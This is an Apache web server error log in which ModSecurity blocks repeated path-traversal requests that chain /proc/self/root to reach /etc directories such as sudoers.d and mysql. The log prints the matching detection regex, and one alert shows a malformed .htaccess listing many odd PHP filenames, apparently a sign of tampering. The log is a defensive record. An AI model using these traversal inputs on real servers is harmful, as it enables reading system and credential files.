[Thu Mar 19 16:25:45.142483 2026] [:error] [pid 21563:tid 140411699963648] [client 74.7.243.128:40520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNuUpm7ZmxKZTM4bZqsgAAA4U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:45.665838 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:38306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNueoXxyEfFpUF8f8y5QAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:49.085828 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:40534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNveoXxyEfFpUF8f8y5gAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:51.294351 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:55790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNv-oXxyEfFpUF8f8y5wAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:52.179176 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:45662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNwPqxLDW4GITHUkSOkQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:54.928153 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:45666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNwsdf6f5d65gmYZSgOQAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:25:57.523045 2026] [:error] [pid 21563:tid 140411699963648] [client 74.7.241.31:55798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNxUpm7ZmxKZTM4bZqtwAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:25:57.647765 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:45670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNxeoXxyEfFpUF8f8y6QAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:26:01.317490 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:39750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNycdf6f5d65gmYZSgOwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:26:02.801904 2026] [proxy_fcgi:error] [pid 15826:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57148] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:26:03.059322 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:42124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNy-oXxyEfFpUF8f8y6wAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:26:04.263879 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:39764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNzPXLqtnMIWvjpaJFzAAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:26:05.710809 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:42130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNzfXLqtnMIWvjpaJFzQAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:26:06.780366 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:39768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxNzvXLqtnMIWvjpaJFzgAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:26:12.656372 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:39776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxN1OoXxyEfFpUF8f8y7gAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:26:13.152488 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:37324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxN1fXLqtnMIWvjpaJF0AAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:26:14.248696 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:47890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxN1vXLqtnMIWvjpaJF0QAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:26:15.339076 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:37334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxN1_XLqtnMIWvjpaJF0gAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 16:26:24.058518 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:47896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxN4PXLqtnMIWvjpaJF1QAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:26:31.449848 2026] [proxy_fcgi:error] [pid 7893:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57696] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:26:31.832084 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:60704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxN5xCii7xarUs8iHYQuwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 16:26:53.154917 2026] [proxy_fcgi:error] [pid 20435:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58144] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:27:15.218019 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58686] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:27:18.053691 2026] [core:alert] [pid 26799:tid 140411733534464] [client 94.26.106.114:50280] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section, referer: https://duckduckgo.com/
[Thu Mar 19 16:27:37.295017 2026] [proxy_fcgi:error] [pid 27293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59184] AH01075: Error dispatching request to : (polling)
